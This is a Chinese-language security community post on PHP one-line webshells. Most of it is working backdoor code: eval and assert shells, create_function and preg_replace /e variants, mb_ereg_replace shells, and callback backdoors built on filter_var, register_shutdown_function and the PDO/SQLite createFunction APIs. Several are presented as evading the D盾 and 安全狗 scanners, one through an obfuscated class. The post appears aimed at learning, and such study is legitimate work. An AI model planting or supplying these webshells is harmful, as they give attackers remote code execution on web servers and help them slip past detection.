奇安信攻防社区-关于php一句话木马的学习

关于php一句话木马的学习

# php一句话后门 ## 开发很久的可利用函数 ### eval和assert php任意代码执行的一句话后门，我们喜欢用的是传统的**eval**，php5，7通用。 ``` <?php @eval($_POST['a']) ?>...

php一句话后门
========

开发很久的可利用函数
----------

### eval和assert

php任意代码执行的一句话后门，我们喜欢用的是传统的**eval**，php5，7通用。

```php
<?php @eval($_POST['a']) ?>
```

但由于eval不能拆分，早期也有人喜欢用**assert**，这样通过编码和拆分assert，隐蔽性更高

```php
<?php @assert($_POST['a']) ?>
```

虽然有人说assert在php7.0及其以上版本被禁用，但实际上并没有禁用，而是和eval一样禁止拆分了。

绝大部分一句话后门，都跟这两个函数（其实不是函数）有关

### create\_function和preg\_replace函数

**create\_function**，它的作用是创建一个匿名函数，在内部也相当于执行了一次eval。php5，7都可用

```php
<?php $st=@create_function('',$_POST['a']);$st();?>
```

/e修饰符，也就是大家熟知的**preg\_replace**。这个则是真的php7用不了了，仅限php5。

```php
<?php @preg_replace('/.*/e',$_POST['a'],'');?>
```

除了preg\_replace之外，还有一个和它类似的函数。

```php
<?php @preg_filter('/.*/e',$_POST['a'],'');?>
```

这两个都是仅限php5的，php7也想用这种方法怎么办呢？有办法，php并没有完全将/e修饰符赶尽杀绝。

```php
<?php @mb_ereg_replace('.*',$_POST['a'],'','ee');?>
<?php @mb_eregi_replace('.*',$_POST['a'],'','ee');?>
```

它们甚至还有别名

```php
<?php @mbereg_replace('.*',$_POST['a'],'','ee');?>
<?php @mberegi_replace('.*',$_POST['a'],'','ee');?>
```

绕D盾方法
-----

上面这些都开发出来很久了，单纯拿这些去绕D盾是很难的，这里也不是来教大家绕D盾的。想绕的话，其实D盾对类的检测力度不高，自己写个混淆一点的类，php5用assert拆分，php7用create\_function拆分其实就很容易绕过去。举个例子

```php
//该例子为create_function拆分，php5.3.29和5.2.17测试完不可行，php5.4.45-php7都可行。故php5用assert拆分，php7用create_function拆分这样最稳
<?php
class create{
public $filter = ['q'=>'_function'];
public $value = '';
public function __construct(){
$this->value = $_POST['a'];
$name=get_class($this).$this->filter['q'];
$st=$name('',$this->value);
$st();
}
}
$a = new create();
```

### 免杀一句话木马之回调函数

回调函数的本质是下面这种代码，以函数作为变量。

```php
<?php $_GET['a']($_GET['b']);?>
```

比较老的回调后门

URL地址：<http://127.0.0.1/1.php> 连接密码：pass

php中call\_user\_func是执行回调函数的标准方法，这是比较老的后门了：

```php
<?php
call_user_func('assert', $_REQUEST['pass']);
```

```php
<?php
call_user_func_array('assert', array($_REQUEST['pass']));
```

真免杀回调后门(过安全狗,D盾)

URL地址：<http://127.0.0.1/1.php?e=assert> 连接密码：pass

```php
<?php
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
```

```php
<?php
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
```

```php
<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
```

```php
<?php
mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');
```

下面这两个回调后门，都是依靠php扩展库（pdo和sqlite3）来实现的：

```php
<?php
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
```

上面这种sqlite方法是依靠PDO执行的。我们也可以直接调用sqlite3的方法构造回调后门，前提是php5.3以上。

```php
<?php
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
$stmt->execute();
```

发表于 2021-05-31 17:16:23
阅读 ( 5761 )
分类：WEB安全

关于php一句话木马的学习

0 条评论